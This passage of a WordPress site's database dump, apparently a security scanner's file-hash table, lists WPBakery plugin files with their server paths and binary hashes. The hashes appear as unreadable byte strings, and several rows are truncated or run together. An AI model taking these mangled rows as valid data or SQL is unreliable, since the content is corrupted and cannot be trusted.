5;PB','',0,'?'),(':^^\0$4\nv','wp-content/plugins/js_composer/include/classes/shortcodes/vc-message.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-message.php',0,'d5kELhZ8','d5kELhZ8','pJZY6q_dQ U\\','',0,'?'),('5v%doZ7L','wp-content/plugins/js_composer/include/classes/shortcodes/vc-pie.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-pie.php',0,'\Zuo<2 Zo^k4','',0,'?'),('nIAЁ9k\'','wp-content/plugins/js_composer/include/classes/shortcodes/vc-posts-slider.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-posts-slider.php',0,'B۸gk\Z콑','B۸gk\Z콑','&55\Z6GT0.؊m','',0,'?'),('<0CoZete*','wp-content/plugins/js_composer/include/classes/shortcodes/vc-progress-bar.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-progress-bar.php',0,'[UPe7/8q*','[UPe7/8q*','dzV[hjm\0}!1&>\ng cT2','',0,'?'),(':\r\"ÙyE','wp-content/plugins/js_composer/include/classes/shortcodes/vc-raw-html.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-raw-html.php',0,'U]}~8','U]}~8','Kb>BLؖA\'jن\'','',0,'?'),('=YOoO2','wp-content/plugins/js_composer/include/classes/shortcodes/vc-raw-js.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-raw-js.php',0,'\0IJUK;5','\0IJUK;5','@/2^c0{qߪ]GB','',0,'?'),('','',0,'?'),('G~Y-;j1\0','wp-content/plugins/js_composer/include/classes/shortcodes/vc-row-inner.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-row-inner.php',0,'\Z>K5ٝ K3','\Z>K5ٝ K3','*EtdFԪV4\r\Zyȹ6pv½','',0,'?'),('yWÌhmo9','wp-content/plugins/js_composer/include/classes/shortcodes/vc-row.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-row.php',0,'7!_Q','7!_Q','C-%-__éR$zwegI(ƜG6','',0,'?'),('f$ mfATq','wp-content/plugins/js_composer/include/classes/shortcodes/vc-section.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-section.php',0,'Xp4}h!Y','Xp4}h!Y','$fLK?uj4rbzB ','',0,'?'),(' 3IACp~ ','wp-content/plugins/js_composer/include/classes/shortcodes/vc-separator.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-separator.php',0,'˒Xg','˒Xg','#DdBu*Z_d <#','',0,'?'),('/{Tʽۏj','wp-content/plugins/js_composer/include/classes/shortcodes/vc-single-image.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-single-image.php',0,'XYˆyFh','XYˆyFh','d4&!=! 447:\nF','',0,'?'),('<~(+ ','wp-content/plugins/js_composer/include/classes/shortcodes/vc-tab.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-tab.php',0,'(o(r= ','(o(r= ','yxQÆ@K|>!I:9[','',0,'?'),('\"ۤH1mu<}','wp-content/plugins/js_composer/include/classes/shortcodes/vc-tabs.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-tabs.php',0,'ӛH*vh C','ӛH*vh C','lFVJ4|(3iMA֝\rC\nxV','',0,'?'),('M}Gqgz(Y','wp-content/plugins/js_composer/include/classes/shortcodes/vc-text-separator.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-text-separator.php',0,'','','(#ޟϏ3`׸wgX?֙\\w8T[','',0,'?'),('. @KHYhWs,','wp-content/plugins/js_composer/include/classes/shortcodes/vc-toggle.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-toggle.php',0,'I<2:zm|0','I<2:zm|0','Wtgʐ\'E94(1,','',0,'?'),('k]lKVI$','wp-content/plugins/js_composer/include/classes/shortcodes/vc-tour.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/vc-tour.php',0,'.fF+U/','.fF+U/','(نaQ\Z.y','wp-content/plugins/js_composer/include/classes/shortcodes/wordpress-widgets.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/shortcodes/wordpress-widgets.php',0,'φ8lf9+','φ8lf9+','\nO:?<8%MCإƢS','',0,'?'),('{#9 18Z`$ sBwd','',0,'?'),('y@bTc','wp-content/plugins/js_composer/include/classes/updaters/class-vc-updating-manager.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/updaters/class-vc-updating-manager.php',0,']% ӱt ',']% ӱt ','DCQ+Ȱ0','',0,'?'),('gf_C}','wp-content/plugins/js_composer/include/classes/vendors/plugins/acf/class-vc-acf-shortcode.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/vendors/plugins/acf/class-vc-acf-shortcode.php',0,'Ne@\'o(','Ne@\'o(','XP.&W#]N*%B ','',0,'?'),('\ZTiSx-f','wp-content/plugins/js_composer/include/classes/vendors/plugins/acf/class-vc-gitem-acf-shortcode.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/vendors/plugins/acf/class-vc-gitem-acf-shortcode.php',0,'{7osg8','{7osg8','J tϱȗ P sEeM|=)n','',0,'?'),('9vz9\rv','wp-content/plugins/js_composer/include/classes/vendors/plugins/acf/grid-item-attributes.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/vendors/plugins/acf/grid-item-attributes.php',0,'x\\A%*X9','x\\A%*X9',' *mS\\s#Lm_6B','',0,'?'),('8[Mn-m','wp-content/plugins/js_composer/include/classes/vendors/plugins/acf/grid-item-shortcodes.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/classes/vendors/plugins/acf/grid-item-shortcodes.php',0,'0`\'odS,\0aWP','0`\'odS,\0aWP','?f˴tIo+v.р#ew ','',0,'?'),('ڭ0','',0,'?'),('ütŖ:','wp-content/plugins/js_composer/include/helpers/class-vc-image-filter.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/helpers/class-vc-image-filter.php',0,'â0;2?','â0;2?','j%̫1:\'\"M@(eOi؊3t','',0,'?'),('ŋQ>Nf3wS\'','wp-content/plugins/js_composer/include/helpers/helpers.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/helpers/helpers.php',0,'S$3c','S$3c','Ԣ>$JTB ,BN6}mW50\\#,','',0,'?'),('7ljL\n8b}','wp-content/plugins/js_composer/include/helpers/helpers_api.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/helpers/helpers_api.php',0,'㕨I{#.','㕨I{#.','%|9L [ E5gM;k]: \'','',0,'?'),(' ĨTwYC','wp-content/plugins/js_composer/include/helpers/helpers_factory.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/helpers/helpers_factory.php',0,'%t^)WĹYJ^','%t^)WĹYJ^','ǹ be\rvk\r\ZG~K 0Xj','',0,'?'),('݌41ѓ','wp-content/plugins/js_composer/include/params/animation_style/animation_style.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/animation_style/animation_style.php',0,'r4','wp-content/plugins/js_composer/include/params/column_offset/column_offset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/column_offset/column_offset.php',0,'V))w+8̾uw','V))w+8̾uw','V71\'`:(A㼃i','',0,'?'),('<>xPF','wp-content/plugins/js_composer/include/params/css_editor/css_editor.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/css_editor/css_editor.php',0,'(gRd!koMփ','(gRd!koMփ','\Zy\0Z\0 \Z;F1`t) ','',0,'?'),(' .s\"5ԉxcH','wp-content/plugins/js_composer/include/params/custom_markup/custom_markup.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/custom_markup/custom_markup.php',0,'jԭŸ7?l}.','jԭŸ7?l}.','e|7ê : 4f-','',0,'?'),('P_w^!R31q','wp-content/plugins/js_composer/include/params/default_params.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/default_params.php',0,'@m ٘=*\"','@m ٘=*\"','uOM!l!d{P','',0,'?'),('\0Dd4B`','wp-content/plugins/js_composer/include/params/el_id/el_id.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/el_id/el_id.php',0,':T~>7 d',':T~>7 d',' ƨ=3\'*a !}','',0,'?'),('܍vz c*1$n','wp-content/plugins/js_composer/include/params/font_container/font_container.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/font_container/font_container.php',0,'?27q','?27q',' uOvB)h9gJkW7','',0,'?'),('EDOuK)\\GS','wp-content/plugins/js_composer/include/params/google_fonts/google_fonts.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/google_fonts/google_fonts.php',0,'*!}fAV @,j','*!}fAV @,j','L4Fq`f5̢\0(Ϧ;','',0,'?'),('o.5U 4b*','wp-content/plugins/js_composer/include/params/gutenberg/class-vc-gutenberg-param.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/gutenberg/class-vc-gutenberg-param.php',0,'wmzMGQ7','wmzMGQ7','\n`JlYл!*?X ','',0,'?'),('t{Ud ','wp-content/plugins/js_composer/include/params/gutenberg/gutenberg.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/gutenberg/gutenberg.php',0,'Za5b6','Za5b6','sCa⿖4-zݥdJު','',0,'?'),(':\"i(2Xr','wp-content/plugins/js_composer/include/params/hidden/hidden.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/hidden/hidden.php',0,'6IPfkW0\r&','6IPfkW0\r&','g~M׽9\"kT N+:\\9','',0,'?'),('-wm`GgC#','wp-content/plugins/js_composer/include/params/href/href.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/href/href.php',0,'ZB~;O>','ZB~;O>','R 71-)ւ;\',x먩>@g','',0,'?'),('|v&I ܋f','wp-content/plugins/js_composer/include/params/iconpicker/iconpicker.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/iconpicker/iconpicker.php',0,'pG]</','pG]</','G~aOwvӓJ%(8Qrl','',0,'?'),('ը\nphjia1','wp-content/plugins/js_composer/include/params/load.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/load.php',0,'+\rc]VG:','+\rc]VG:','UL*\rM ^f` M~P[','',0,'?'),('\09M)^','wp-content/plugins/js_composer/include/params/loop/loop.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/loop/loop.php',0,'1!TJ3۷{','1!TJ3۷{','FӇ~2\ZS\rT^=2 D','',0,'?'),('MT{jԙ','wp-content/plugins/js_composer/include/params/options/options.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/options/options.php',0,'fٹR!_T8','fٹR!_T8','~^y*^Kw]ûm R]','',0,'?'),('br,V:TU','wp-content/plugins/js_composer/include/params/param_group/param_group.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/param_group/param_group.php',0,'1T:95','1T:95','F4,(1U.\ZZέi>\'','',0,'?'),('&Ag2N q|','wp-content/plugins/js_composer/include/params/params.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/params.php',0,'1\0OzYt','1\0OzYt','BMDn2zwmk','',0,'?'),('FL`a)]Z','wp-content/plugins/js_composer/include/params/params_preset/params_preset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/params_preset/params_preset.php',0,'v0;zm$qjP','v0;zm$qjP',',ܮp \r=y@jdrl+b','',0,'?'),('ؖ eTwcvo','wp-content/plugins/js_composer/include/params/sorted_list/sorted_list.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/sorted_list/sorted_list.php',0,' bOS2yn',' bOS2yn','}KTHhʱpo1Ƕ;K-','',0,'?'),('Kf\rk6B_)','wp-content/plugins/js_composer/include/params/tab_id/tab_id.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/tab_id/tab_id.php',0,'.NNkMd','.NNkMd','IhijJ6ⷦfEÂM','',0,'?'),('C- GNR','wp-content/plugins/js_composer/include/params/textarea_html/textarea_html.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/textarea_html/textarea_html.php',0,'@ՙ`8\\W:','@ՙ`8\\W:',',cʴ3XdmgsDK','',0,'?'),('/f䌴^`4\"6','wp-content/plugins/js_composer/include/params/vc_grid_element/vc_grid_element.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/vc_grid_element/vc_grid_element.php',0,'ŐzкiPLI','ŐzкiPLI','%цVF \Z/#QFET','',0,'?'),('#,b[\"&','wp-content/plugins/js_composer/include/params/vc_grid_element/vc_grid_id/vc_grid_id.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/vc_grid_element/vc_grid_id/vc_grid_id.php',0,'sIa+ǞO\\B*,','sIa+ǞO\\B*,','|TlPkzy)5k&p].*@f','',0,'?'),('9B{\'M','wp-content/plugins/js_composer/include/params/vc_grid_item/attributes.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/vc_grid_item/attributes.php',0,'VpB%GH\n˞','VpB%GH\n˞','i2܇L6˹\r*_:','',0,'?'),('a#A&V','wp-content/plugins/js_composer/include/params/vc_grid_item/class-vc-grid-item.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/vc_grid_item/class-vc-grid-item.php',0,'{*;ob','{*;ob','u\'w!dbkZ;DMHv','',0,'?'),('H@4g\nK','wp-content/plugins/js_composer/include/params/vc_grid_item/class-wpb-map-grid-item.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/vc_grid_item/class-wpb-map-grid-item.php',0,'ճ=MR@B;','ճ=MR@B;','r=5tn=;uRlALr','',0,'?'),('dxl','wp-content/plugins/js_composer/include/params/vc_grid_item/editor/class-vc-grid-item-editor.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/vc_grid_item/editor/class-vc-grid-item-editor.php',0,' l,Or CR',' l,Or CR','iN-$E:oUa^L~e2&}w','',0,'?'),(' dRI\0g#','wp-content/plugins/js_composer/include/params/vc_grid_item/editor/class-vc-grid-item-preview.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/vc_grid_item/editor/class-vc-grid-item-preview.php',0,'G>9/$,rN`','G>9/$,rN`','#>\'\0,\0%|[\'','',0,'?'),('3c5䈟','wp-content/plugins/js_composer/include/params/vc_grid_item/editor/navbar/class-vc-navbar-grid-item.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/vc_grid_item/editor/navbar/class-vc-navbar-grid-item.php',0,'0-):k_JX','0-):k_JX','/k&\rɠ=-EA(z>','',0,'?'),('{ٲ͎K3\'','wp-content/plugins/js_composer/include/params/vc_grid_item/editor/popups/class-vc-add-element-box-grid-item.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/vc_grid_item/editor/popups/class-vc-add-element-box-grid-item.php',0,'dq}Q<5+','dq}Q<5+','o-[\\T? 90X&w','',0,'?'),('n42U4N\ZbtmNl','wp-content/plugins/js_composer/include/params/vc_grid_item/editor/popups/class-vc-templates-editor-grid-item.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/vc_grid_item/editor/popups/class-vc-templates-editor-grid-item.php',0,'9֓FӑE','9֓FӑE','ӟ66-(n^^0=}gѸ','',0,'?'),('J','wp-content/plugins/js_composer/include/params/vc_grid_item/shortcodes.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/vc_grid_item/shortcodes.php',0,'k]Ԧ9%孴z','k]Ԧ9%孴z','G^vMtfHI9er;ؚ5<','',0,'?'),('v <Z]q','wp-content/plugins/js_composer/include/params/vc_grid_item/templates.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/vc_grid_item/templates.php',0,'ؚ#Tm,;','ؚ#Tm,;','R7>̍o2P)yzKh~','',0,'?'),('O\r~Q','wp-content/plugins/js_composer/include/params/vc_link/vc_link.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/params/vc_link/vc_link.php',0,'KD=~u\'YHV','KD=~u\'YHV','~\rw\Z9z\0 uxxD]mk','',0,'?'),('ԥ85^QZ','wp-content/plugins/js_composer/include/templates/editors/backend_editor.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/editors/backend_editor.tpl.php',0,'!9\r2{fv7S̫','!9\r2{fv7S̫','e šuӰzwhbZ\0O{&','',0,'?'),('0 cUPePQ','wp-content/plugins/js_composer/include/templates/editors/frontend_editor.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/editors/frontend_editor.tpl.php',0,'vWw7[','vWw7[','@^/Cuda \nG','',0,'?'),('Uݠd [\n5','wp-content/plugins/js_composer/include/templates/editors/frontend_template.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/editors/frontend_template.tpl.php',0,'OLjA\'W40j','OLjA\'W40j','~|kyB\'Y  $ϠUq>','',0,'?'),('Gyİik','wp-content/plugins/js_composer/include/templates/editors/navbar/navbar.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/editors/navbar/navbar.tpl.php',0,'3B>wflޡ','3B>wflޡ','͉D,`(TO9DVm V_X ‘d','',0,'?'),('\"FP` #vK','wp-content/plugins/js_composer/include/templates/editors/partials/access-manager-js.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/editors/partials/access-manager-js.tpl.php',0,'DpרSxAB','DpרSxAB','x*IȟNc;߽=fm','',0,'?'),('\'HDΓn\0','wp-content/plugins/js_composer/include/templates/editors/partials/add_element_search.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/editors/partials/add_element_search.tpl.php',0,' 7X-u',' 7X-u','aW\0A4xdfnޚeNk','',0,'?'),('s*v`c','wp-content/plugins/js_composer/include/templates/editors/partials/add_element_tabs.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/editors/partials/add_element_tabs.tpl.php',0,'YOӗf ','YOӗf ','WƼX3:P)V>/G(}Юm','',0,'?'),('t.2ʜ','wp-content/plugins/js_composer/include/templates/editors/partials/backend-shortcodes-templates.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/editors/partials/backend-shortcodes-templates.tpl.php',0,'X\r8Mx','X\r8Mx',' kdEC+7\"[','',0,'?'),('BȾjiAbݬ','wp-content/plugins/js_composer/include/templates/editors/partials/backend_controls.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/editors/partials/backend_controls.tpl.php',0,'׃:u蓋\\SD_','׃:u蓋\\SD_','Xr@,nfԛyi c\ZY^Ϟ(','',0,'?'),(',!!iM)Nb&','wp-content/plugins/js_composer/include/templates/editors/partials/backend_controls_tab.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/editors/partials/backend_controls_tab.tpl.php',0,'F-\'G19^','F-\'G19^','}K)TRK\0X(GWЂ9 Ⴃ','',0,'?'),('/afw=?\Z6PI','wp-content/plugins/js_composer/include/templates/editors/partials/backend_editor_footer.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/editors/partials/backend_editor_footer.tpl.php',0,'gƼ&z','gƼ&z','eET$cط]쀺VV?.0R','',0,'?'),('\n\r!\Zo>)E','wp-content/plugins/js_composer/include/templates/editors/partials/frontend_controls.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/editors/partials/frontend_controls.tpl.php',0,'`\Z4U2','`\Z4U2','\0d~[L`C=5&Wi0ۿ','',0,'?'),(':N !ٍ','wp-content/plugins/js_composer/include/templates/editors/partials/post_shortcodes.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/editors/partials/post_shortcodes.tpl.php',0,'?B=9XA','?B=9XA','t)(}X=8eHS +','',0,'?'),('kqd56: \0)','wp-content/plugins/js_composer/include/templates/editors/partials/prompt-presets.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/editors/partials/prompt-presets.tpl.php',0,'ʩY5~U0','ʩY5~U0','ALiqB,HrNL','',0,'?'),('l\r1mXUD>','wp-content/plugins/js_composer/include/templates/editors/partials/prompt-templates.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/editors/partials/prompt-templates.tpl.php',0,'@hr5V','@hr5V','dgy OBdv^\ZkRvFN}','',0,'?'),('Hw\0q!a7Qx8','wp-content/plugins/js_composer/include/templates/editors/partials/settings_presets_popup.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/editors/partials/settings_presets_popup.tpl.php',0,'qn\\T1C12','qn\\T1C12','Z M[UY9f,Ζ>ڷ,cbZ','',0,'?'),('tl^im_%','wp-content/plugins/js_composer/include/templates/editors/partials/templates_search.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/editors/partials/templates_search.tpl.php',0,'_ۓ^kUAϊ','_ۓ^kUAϊ','\';FK&kx','wp-content/plugins/js_composer/include/templates/editors/partials/vc_ui-templates-tabs.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/editors/partials/vc_ui-templates-tabs.tpl.php',0,'Ti6?\': X','Ti6?\': X','>򠇍M8WDuaiS FV>q','',0,'?'),('CT©]*~<','wp-content/plugins/js_composer/include/templates/editors/partials/vc_welcome_block.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/editors/partials/vc_welcome_block.tpl.php',0,'?SZ y7d','?SZ y7d','(+gj,ǝqobZ. y6K ','',0,'?'),('!;+%yxs','wp-content/plugins/js_composer/include/templates/editors/popups/modal_edit_element.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/editors/popups/modal_edit_element.tpl.php',0,'ވʃff[8\Z','ވʃff[8\Z','l\"-^˹r?;u|GxCE)','',0,'?'),('ك u4 ','wp-content/plugins/js_composer/include/templates/editors/popups/panel_multi_shortcode_edit_form.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/editors/popups/panel_multi_shortcode_edit_form.tpl.php',0,':yU{26Xn\0',':yU{26Xn\0','rBӯveen{C\'fa:hM','',0,'?'),('uMC9Ocw1(','wp-content/plugins/js_composer/include/templates/editors/popups/panel_shortcode_edit_form.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/editors/popups/panel_shortcode_edit_form.tpl.php',0,'k2𵩑\r!a','k2𵩑\r!a','¨&+Ϻs\Z-ݰc\Z5','',0,'?'),('J.s}jB','wp-content/plugins/js_composer/include/templates/editors/popups/shared-templates/category.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/editors/popups/shared-templates/category.tpl.php',0,'<Sj6|9F','<Sj6|9F','ؕH~2G','wp-content/plugins/js_composer/include/templates/editors/vc_ui-template-preview.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/editors/vc_ui-template-preview.tpl.php',0,'7a','7a','~\n\0)\r3At5_uF9yYb]_','',0,'?'),('GpFK)6i8','wp-content/plugins/js_composer/include/templates/pages/partials/_settings_tabs.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/pages/partials/_settings_tabs.php',0,'4gXz}zh^','4gXz}zh^','{!;)\"+KF9j틈ž) :ֈ/','',0,'?'),(')W%]!;z','wp-content/plugins/js_composer/include/templates/pages/partials/_tabs.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/pages/partials/_tabs.php',0,'%, Tֲ滍yQ','%, Tֲ滍yQ','g02$z͉I&SzFҲ','',0,'?'),('r%IZѪ\r٨Ix','wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_backend_editor.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_backend_editor.tpl.php',0,'2HFU','2HFU','urgp晖yP0;RaW','',0,'?'),('E;rM+e&Q3f','wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_dragndrop.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_dragndrop.tpl.php',0,'à+a_c^','à+a_c^','glQt5Cn_:\Z','',0,'?'),('KoR }','wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_frontend_editor.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_frontend_editor.tpl.php',0,'$-+,1l~E','$-+,1l~E','ʹ3I=ߤpN63','',0,'?'),('>sHಈ','wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_grid_builder.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_grid_builder.tpl.php',0,'w\Z\Zm','w\Z\Zm',' U:*\'f c+]Jo@Mp','',0,'?'),('\'#308RUT','wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_part.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_part.tpl.php',0,'Ͻb-=#9 N','Ͻb-=#9 N','Z3ૈw8(?i.k wZK!q','',0,'?'),('i3օ;(','wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_post_settings.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_post_settings.tpl.php',0,'rm-|I) ','rm-|I) ',':8nykN9(HiB','',0,'?'),('rBY)AP+','wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_post_types.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_post_types.tpl.php',0,'3Ã`~','3Ã`~',' 5vM.?cmp;+IDD4EP','',0,'?'),('lYOIvYJ%','wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_presets.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_presets.tpl.php',0,')ed ,Cs',')ed ,Cs','m$\Z|A]Th9L\Zqȶ','',0,'?'),('P$9e`z@3>','wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_settings.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_settings.tpl.php',0,'kؼok@#','kؼok@#','DdHfxRjDm)','',0,'?'),('aP )Ҽ l','wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_shortcodes.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_shortcodes.tpl.php',0,'5\'Ճ/}','5\'Ճ/}','U;C}yA#on>','',0,'?'),('𿆒¿O&&5/','wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_templates.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_templates.tpl.php',0,'ϧDB|\'t','ϧDB|\'t',')\\yԮ\rU}峘Y0I=T>','',0,'?'),(' jz1e?yx','wp-content/plugins/js_composer/include/templates/pages/vc-settings/default-template-post-type.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/pages/vc-settings/default-template-post-type.tpl.php',0,'lᵿgح}m','lᵿgح}m','eO88?X\0YWL,O+','',0,'?'),(';Etzb-','wp-content/plugins/js_composer/include/templates/pages/vc-settings/index.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/pages/vc-settings/index.php',0,'^EИO˝`T','^EИO˝`T','FƟ@Hg  U','',0,'?'),('3Ct/N)DI','wp-content/plugins/js_composer/include/templates/pages/vc-settings/tab-vc-roles.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/pages/vc-settings/tab-vc-roles.php',0,'Ŋn0,]Q{','Ŋn0,]Q{','Q}6ߚJCJ$Ov#.IJjv?','',0,'?'),('ٵ/\n59Jz','wp-content/plugins/js_composer/include/templates/pages/vc-settings/tab.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/pages/vc-settings/tab.php',0,',@x/}4V$i',',@x/}4V$i','!\"?\0kV/7rT;8pZm','',0,'?'),('E,kObnIj','wp-content/plugins/js_composer/include/templates/pages/vc-settings/vc-automapper.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/templates/pages/vc-settings/vc-automapper.php',0,'FH\"}:K','FH\"}:K','^↦BC 